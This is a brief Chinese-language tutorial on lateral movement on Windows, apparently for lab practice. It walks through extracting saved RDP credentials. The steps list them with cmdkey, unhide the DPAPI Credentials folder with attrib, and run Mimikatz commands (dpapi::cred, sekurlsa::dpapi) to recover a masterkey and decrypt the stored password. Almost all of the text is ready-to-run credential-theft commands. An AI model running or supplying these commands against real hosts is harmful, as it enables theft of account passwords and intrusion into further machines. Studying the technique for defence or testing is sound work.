横向过程
前提是主机上保存过RDP凭证,查看命令(Administrator管理员权限):
cmdkey /list
第一步:查看凭证
查看凭证文件所在位置,命令:
dir /a %USERPROFILE%\AppData\Local\Microsoft\Credentials\*
但是如果你在实验的过程中保存了rdp凭证,但是访问这个文件夹是空的,开启显示隐藏文件还是空的,这是因为文件夹查看选项勾选了隐藏受保护的操作系统文件(推荐),取消这个勾选再访问这个文件夹即可。
或者通过执行命令,在cmd中执行:
attrib -h -s %USERPROFILE%\AppData\Local\Microsoft\Credentials\*
就可以看到文件夹中保存的凭证文件:
第二步:获取guidMasterKey
利用获取到的凭证文件名结合Mimikatz进行获取guidMasterKey,命令:
mimikatz.exe "privilege::debug" "dpapi::cred /in:%USERPROFILE%\AppData\Local\Microsoft\Credentials\9C23A2F439AEF028DC23FE7632C33FA1" exit
第三步:获取对应guid的Masterkey
命令:
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit
找到与第二步guidMasterKey一样的GUID,然后获取它的MasterKey
第四步:解密RDP凭证文件
使用获取到的MasterKey对对应的RDP凭证进行解密
mimikatz.exe "dpapi::cred /in:%USERPROFILE%\AppData\Local\Microsoft\Credentials\9C23A2F439AEF028DC23FE7632C33FA1 /masterkey:fa3ec12e90730557ef158cdc0fd374187d46964441d4390f2820d8d5ecccd29428bebf9bbcdae5da7c1691d938127e563021a9e60b50265933a023d3f53e37e2" exit
相关链接
https://blog.csdn.net/qq_44159028/article/details/128948031